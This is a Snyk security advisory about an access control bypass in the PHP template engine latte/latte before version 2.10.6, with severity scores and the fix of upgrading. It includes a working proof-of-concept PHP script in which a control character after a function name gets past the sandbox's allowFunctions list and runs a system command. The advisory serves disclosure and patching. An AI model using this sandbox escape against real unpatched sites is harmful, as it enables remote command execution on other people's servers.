Access Control Bypass Affecting latte/latte package, versions <2.10.6


Severity

Recommended
0.0
critical
0
10

CVSS assessment made by Snyk's Security Team

    Threat Intelligence

    Exploit Maturity
    Proof of concept
    EPSS
    0.33% (72nd percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-PHP-LATTELATTE-1932226
  • published 9 Dec 2021
  • disclosed 26 Nov 2021
  • credit Jiang

How to fix?

Upgrade latte/latte to version 2.10.6 or higher.

Overview

latte/latte is an intuitive and fast template engine for those who want the most secure PHP sites. Introduces context-sensitive escaping.

Affected versions of this package are vulnerable to Access Control Bypass. There is a way to bypass allowFunctions that will affect the security of the application. When the template is set to allow/disallow the use of certain functions, adding control characters (x00-x08) after the function will bypass these restrictions.

PoC

// The following PoC will execute the system function "whoami"
<?php
error_reporting(0);
require 'vendor/autoload.php';
$latte = new Latte\Engine;
$policy = new Latte\Sandbox\SecurityPolicy;
$policy->allowFilters($policy::ALL);
$policy->allowMacros(['if','=']);
$policy->allowFunctions(['strlen']);
$latte->setPolicy($policy);
$latte->setSandboxMode();
$latte->setAutoRefresh(false);
file_put_contents('index.latte',"{=system\x00('whoami')}");
$latte->render('index.latte');

CVSS Scores

version 3.1
Expand this section

Snyk

9.8 critical
  • Attack Vector (AV)
    Network
  • Attack Complexity (AC)
    Low
  • Privileges Required (PR)
    None
  • User Interaction (UI)
    None
  • Scope (S)
    Unchanged
  • Confidentiality (C)
    High
  • Integrity (I)
    High
  • Availability (A)
    High
Expand this section

NVD

9.8 critical